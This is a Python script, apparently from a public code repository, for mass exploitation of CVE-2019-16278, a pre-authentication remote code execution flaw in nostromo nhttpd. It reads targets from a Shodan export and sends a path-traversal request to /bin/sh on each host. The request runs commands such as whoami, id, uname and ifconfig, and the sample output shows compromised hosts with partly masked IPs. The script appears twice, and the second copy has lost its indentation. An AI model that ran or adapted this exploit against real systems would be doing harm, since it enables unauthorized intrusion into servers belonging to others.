0xsha/CVE-2019-16278_mass.py

## CVE-2019-16278_mass.py
# CVE-2019-16278 nhttpd (nostromo) < 1.9.7 pre-auth RCE
# Based on https://git.sp0re.sh/sp0re/Nhttpd-exploits
# Write-up : https://www.sudokaikan.com/2019/10/cve-2019-16278-unauthenticated-remote.html
# Copyright (C) 2020 0xsha.io <me@0xsha.io>

"""

python3 cve_2019_16278.py

[~] Trying ... 62.138.23.XXX 53
[~] Trying ... 193.200.72.XXX 21
[~] Trying ... 137.119.19.XXX 8080
[~] Trying ... 202.134.205.XXX 80
[~] Trying ... 206.246.5.XXX 8080

[~] Trying ... 206.246.6.XXX 8080
#################### Vulnerable #######################
uid=2(daemon) gid=2(bin) groups=0(root)
Linux (none) 2.6.28.10-arm1HNSSahara #4 PREEMPT Fri Aug 28 11:09:54 EDT 2015 armv6l unknown

#################### End #######################

"""

"""
@author:       0xSha
@contact:      me@0xsha.io
@organization: www.0xsha.io
"""

import csv
import requests


# in case of debugging and hosting detection
# import json
# import time


def read_hosts_from_csv():
    """
    reads the shodan cvs dump and extract host and ports
    @:parameter none
    :return: host lists
    """
    path = '/shodan-export.csv'
    host_lists = []
    with open(path, newline='') as csvfile:
        records = csv.reader(csvfile)
        for record in records:
            host_lists.append(record[0] + ":" + record[1])
        return host_lists


if __name__ == '__main__':
    # proxy = {"http": "http://127.0.0.1:8080"}
    exp = "/.%0d./.%0d./.%0d./.%0d./bin/sh"
    for host in read_hosts_from_csv():
        host, port = host.split(':')
        # Lazy Me
        if "IP" not in host:

            # Debugging request
            # req = requests.post('http://' + host + ":" + port+exp,
            #                      data='ifconfig 2>&1; echo "~~~~~~~~~"; id; echo "##########";', timeout=3,
            #                      proxies=proxy)
            try:

                cmd = "whoami;id;uname -a"
                print("[~] Trying ... " + host, port)
                req2 = requests.post('http://' + host + ":" + port + exp,
                                     data='ifconfig 2>&1; echo "~~~~~~~~~~"; ' + cmd + ' ; echo "##########";',
                                     timeout=10)  # change the timeout if needed

                # print (req2.status_code)
                # print (req2.text)
                firstIndex = str(req2.text).find('~~~~~~~~~~')
                secondIndex = str(req2.text).find('##########')

                if firstIndex:
                    print("#################### Vulnerable #######################")
                    print("[+] Now exploiting "+host)
                    print(str(req2.text)[firstIndex + 10:secondIndex])

                    # Host Detection
                    # time.sleep(10)
                    # req3 = requests.get(
                    #     'https://www.who-hosts-this.com/APIEndpoint/Detect?key'
                    #     '=YOUR_API_KEY&url=' + host)
                    # isp = json.loads(req3.text)
                    # print("Hosted by:" + isp['results'][0]['isp_name'])

                    print("#################### End #######################")
            except:
                # print('Err' + host)
                pass
	# CVE-2019-16278 nhttpd (nostromo) < 1.9.7 pre-auth RCE
	# Based on https://git.sp0re.sh/sp0re/Nhttpd-exploits
	# Write-up : https://www.sudokaikan.com/2019/10/cve-2019-16278-unauthenticated-remote.html
	# Copyright (C) 2020 0xsha.io <me@0xsha.io>

	"""

	python3 cve_2019_16278.py

	[~] Trying ... 62.138.23.XXX 53
	[~] Trying ... 193.200.72.XXX 21
	[~] Trying ... 137.119.19.XXX 8080
	[~] Trying ... 202.134.205.XXX 80
	[~] Trying ... 206.246.5.XXX 8080

	[~] Trying ... 206.246.6.XXX 8080
	#################### Vulnerable #######################
	uid=2(daemon) gid=2(bin) groups=0(root)
	Linux (none) 2.6.28.10-arm1HNSSahara #4 PREEMPT Fri Aug 28 11:09:54 EDT 2015 armv6l unknown

	#################### End #######################

	"""

	"""
	@author: 0xSha
	@contact: me@0xsha.io
	@organization: www.0xsha.io
	"""

	import csv
	import requests


	# in case of debugging and hosting detection
	# import json
	# import time


	def read_hosts_from_csv():
	"""
	reads the shodan cvs dump and extract host and ports
	@:parameter none
	:return: host lists
	"""
	path = '/shodan-export.csv'
	host_lists = []
	with open(path, newline='') as csvfile:
	records = csv.reader(csvfile)
	for record in records:
	host_lists.append(record[0] + ":" + record[1])
	return host_lists


	if __name__ == '__main__':
	# proxy = {"http": "http://127.0.0.1:8080"}
	exp = "/.%0d./.%0d./.%0d./.%0d./bin/sh"
	for host in read_hosts_from_csv():
	host, port = host.split(':')
	# Lazy Me
	if "IP" not in host:

	# Debugging request
	# req = requests.post('http://' + host + ":" + port+exp,
	# data='ifconfig 2>&1; echo "~~~~~~~~~"; id; echo "##########";', timeout=3,
	# proxies=proxy)
	try:

	cmd = "whoami;id;uname -a"
	print("[~] Trying ... " + host, port)
	req2 = requests.post('http://' + host + ":" + port + exp,
	data='ifconfig 2>&1; echo "~~~~~~~~~~"; ' + cmd + ' ; echo "##########";',
	timeout=10) # change the timeout if needed

	# print (req2.status_code)
	# print (req2.text)
	firstIndex = str(req2.text).find('~~~~~~~~~~')
	secondIndex = str(req2.text).find('##########')

	if firstIndex:
	print("#################### Vulnerable #######################")
	print("[+] Now exploiting "+host)
	print(str(req2.text)[firstIndex + 10:secondIndex])

	# Host Detection
	# time.sleep(10)
	# req3 = requests.get(
	# 'https://www.who-hosts-this.com/APIEndpoint/Detect?key'
	# '=YOUR_API_KEY&url=' + host)
	# isp = json.loads(req3.text)
	# print("Hosted by:" + isp['results'][0]['isp_name'])

	print("#################### End #######################")
	except:
	# print('Err' + host)
	pass